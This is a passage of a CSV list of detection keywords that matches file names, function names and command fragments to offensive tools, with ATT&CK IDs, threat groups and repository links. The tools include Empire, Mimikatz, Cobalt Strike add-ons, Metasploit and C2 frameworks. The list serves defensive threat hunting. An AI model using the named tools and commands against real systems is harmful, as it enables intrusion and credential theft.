- TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Enable-SeAssignPrimaryTokenPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*encdatavault2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*encfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*encode_payload rc4 *.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*EncodeGroup/AggressiveProxy*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*EncodeGroup/UAC-SilentClean*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*encodeScriptPolyglot*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*EncodeShellcode(*","offensive_tool_keyword","HardHatC2","A C# 
Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*encrypt.py *.bin -p * -o *.enc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*encrypt/encryptFile.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*encrypt/encryptUrl.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*Encrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*encrypted_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*EncryptedPfx.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"*EncryptedZIP.csproj*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptedZIP.exe*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptShellcode(*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" 
+"*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Enelg52/KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Engineer_super.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*engjibo/NetUser*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*enigma_fileless_uac_bypass*","offensive_tool_keyword","venom","venom - C2 shellcode 
generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*enigma0x3*","offensive_tool_keyword","Github Username","Github Author of malicious script and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/enigma0x3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*enkomio/AlanFramework*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*enpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*enpass5tojohn.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Enter-SMBSession -ComputerName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Enter-SMBSession* -PipeName * -ServiceName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command 
Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Enter-WmiShell *","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*Enter-WmiShell.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*--entrypoint Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*enum_artifacts_list.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_av_excluded.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_avproducts.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*enum_brocade.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_domain_info.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*enum_firefox.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*enum_hostfile.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
